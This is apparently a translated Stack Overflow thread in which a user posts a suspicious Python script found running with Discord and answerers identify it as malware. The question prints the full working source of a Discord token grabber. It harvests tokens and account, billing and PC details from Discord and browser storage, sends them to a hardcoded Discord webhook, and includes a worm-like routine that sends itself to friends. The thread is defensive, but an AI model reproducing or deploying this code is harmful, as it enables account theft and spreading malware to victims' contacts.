【问题标题】:Discord malware不和谐恶意软件
【发布时间】:2021-05-17 09:44:24
【问题描述】:

有人就 Discord 的问题与我联系。下面的代码引起了我的注意,因为它是在问题开始时运行的。 Windows 询问下面的代码应该使用什么程序运行,默认为 Discord。每次 Discord 运行时,都会运行这段代码:

import os
if os.name != "nt":
    exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv

LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")

PATHS = {

    "Discord"           : ROAMING + "\\Discord",

    "Discord Canary"    : ROAMING + "\\discordcanary",

    "Discord PTB"       : ROAMING + "\\discordptb",

    "Google Chrome"     : LOCAL + "\\Google\\Chrome\\User Data\\Default",

    "Opera"             : ROAMING + "\\Opera Software\\Opera Stable",

    "Brave"             : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",

    "Yandex"            : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default"

}

def getheaders(token=None, content_type="application/json"):

    headers = {

        "Content-Type": content_type,

        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"

    }

    if token:

        headers.update({"Authorization": token})

    return headers

def getuserdata(token):

    try:

        return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())

    except:

        pass

def gettokens(path):

    path += "\\Local Storage\\leveldb"

    tokens = []

    for file_name in os.listdir(path):

        if not file_name.endswith(".log") and not file_name.endswith(".ldb"):

            continue

        for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:

            for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):

                for token in findall(regex, line):

                    tokens.append(token)

    return tokens

def getdeveloper():

    dev = "wodx"

    try:

        dev = urlopen(Request("https://pastebin.com/raw/ssFxiejv")).read().decode()

    except:

        pass

    return dev

def getip():

    ip = "None"

    try:

        ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()

    except:

        pass

    return ip

def getavatar(uid, aid):

    url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"

    try:

        urlopen(Request(url))

    except:

        url = url[:-4]

    return url

def gethwid():

    p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)

    return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]

def getfriends(token):

    try:

        return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode())

    except:

        pass

def getchat(token, uid):

    try:

        return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]

    except:

        pass

def has_payment_methods(token):

    try:

        return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)

    except:

        pass

def send_message(token, chat_id, form_data):

    try:

        urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()

    except:

        pass

def spread(token, form_data, delay):

    return # Remove to re-enabled

    for friend in getfriends(token):

        try:

            chat_id = getchat(token, friend["id"])

            send_message(token, chat_id, form_data)

        except Exception as e:

            pass

        sleep(delay)

def main():

    cache_path = ROAMING + "\\.cache~$"

    prevent_spam = True

    self_spread = True

    embeds = []

    working = []

    checked = []

    already_cached_tokens = []

    working_ids = []

    ip = getip()

    pc_username = os.getenv("UserName")

    pc_name = os.getenv("COMPUTERNAME")

    user_path_name = os.getenv("userprofile").split("\\")[2]

    developer = getdeveloper()

    for platform, path in PATHS.items():

        if not os.path.exists(path):

            continue

        for token in gettokens(path):

            if token in checked:

                continue

            checked.append(token)

            uid = None

            if not token.startswith("mfa."):

                try:

                    uid = b64decode(token.split(".")[0].encode()).decode()

                except:

                    pass

                if not uid or uid in working_ids:

                    continue

            user_data = getuserdata(token)

            if not user_data:

                continue

            working_ids.append(uid)

            working.append(token)

            username = user_data["username"] + "#" + str(user_data["discriminator"])

            user_id = user_data["id"]

            avatar_id = user_data["avatar"]

            avatar_url = getavatar(user_id, avatar_id)

            email = user_data.get("email")

            phone = user_data.get("phone")

            nitro = bool(user_data.get("premium_type"))

            billing = bool(has_payment_methods(token))

            embed = {

                "color": 0x0eec59,

                "fields": [

                    {

                        "name": "**Account Info**",

                        "value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',

                        "inline": True

                    },

                    {

                        "name": "**PC Info**",

                        "value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',

                        "inline": True

                    },

                    {

                        "name": "**Token**",

                        "value": token,

                        "inline": False

                    }

                ],

                "author": {

                    "name": f"{username} ({user_id})",

                    "icon_url": avatar_url

                },

                "footer": {

                    "text": f"Token grabber by THC4L"

                }

            }

            embeds.append(embed)

    with open(cache_path, "a") as file:

        for token in checked:

            if not token in already_cached_tokens:

                file.write(token + "\n")

    if len(working) == 0:

        working.append('123')

    webhook = {

        "content": "",

        "embeds": embeds,

        "username": "THC4L",

        "avatar_url": "https://discordapp.com/assets/5ccabf62108d5a8074ddd95af2211727.png"

    }

    try:

        urlopen(Request("https://discord.com/api/webhooks/799694650549862420/rFrqEzYaTC7uS353j0HIWZaxGfxe_B6X1aTsPRY_hWOkWQIecm70fKLwMbfb8wyPz2VB", data=dumps(webhook).encode(), headers=getheaders()))

    except:

        pass

    if self_spread:

        for token in working:

            with open(argv[0], encoding="utf-8") as file:

                content = file.read()

            payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nserver crasher. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'

            Thread(target=spread, args=(token, payload, 7500 / 1000)).start()

try:

    main()

except Exception as e:

    print(e)

    pass

知道这可能是什么吗?我可以看到:for token in gettokens(path):"text": f"Token grabber by THC4L" 它几乎看起来像一个 Discord 令牌撇取器。看起来它需要电话号码、用户名、帐户信息、PC 信息等等...

编辑:

这是恶意软件。 这是 Discord 桌面应用程序的令牌记录器。它还会在您的浏览器中查找其他与不和谐相关的信息。

此处已对其进行了更深入的审查:

https://www.youtube.com/watch?v=s3wS1Dd3FFs&feature=youtu.be

编剧在他提供的 Pastebin 链接中提供了一些非常有见地的信息,我建议您查看一下: https://pastebin.com/0q0Fk0Ej

它专门尝试拉动:

  • 公共IP地址
  • Discord 令牌
  • 不和谐的朋友
  • Discord 好友的 ID
  • Dicord 用户名
  • 不和谐用户ID
  • 不和谐电子邮件
  • Discord nitro(检查是否有)
  • 电话号码
  • 帐单信息
  • 电脑用户名
  • 电脑名称
  • PC 平台

自从删除了宣传该脚本的 YouTube 帐户:

https://www.youtube.com/channel/UCydMtuzGQ0kFPhK2hIXFf6A

创建者的 Github 帐户:

https://github.com/ecriminal

【问题讨论】:

    标签: python discord malware


    【解决方案1】:

    那是恶意软件,不仅是令牌记录器,还窃取 Chrome、Brave、Opera 和 Yandex 密码。立即卸载并更改所有密码。

    创作者的 YouTube 频道: https://www.youtube.com/channel/UCydMtuzGQ0kFPhK2hIXFf6A

    更新:事实证明,它还窃取了您的 ip,耶!

    【讨论】:

    • 嗯,实际上,它不会窃取浏览器密码,它只是在那些浏览器中查找您的不和谐令牌。而且IP无所谓,我真的不知道为什么人们担心你的IP被泄露。
    • 真正的问题是,如果 IP 无关紧要,那么他们为什么要窃取您的 IP?
    【解决方案2】:

    这确实是恶意软件,但不是 makerio 所说的那样。它只尝试发送您的不和谐令牌,并在不和谐本身或浏览器中找到它。您必须删除此病毒,并更改您的 Discord 密码。查看代码,他们似乎也启用了将病毒发送给不和谐朋友的选项,因此您应该尝试删除其中包含此病毒的所有消息,并澄清不是您。

    【讨论】:

      猜你喜欢
      • 2019-01-10
      • 2014-03-16
      • 1970-01-01
      • 1970-01-01
      • 1970-01-01
      • 1970-01-01
      • 1970-01-01
      • 2018-07-04
      • 2015-09-05
      相关资源
      最近更新 更多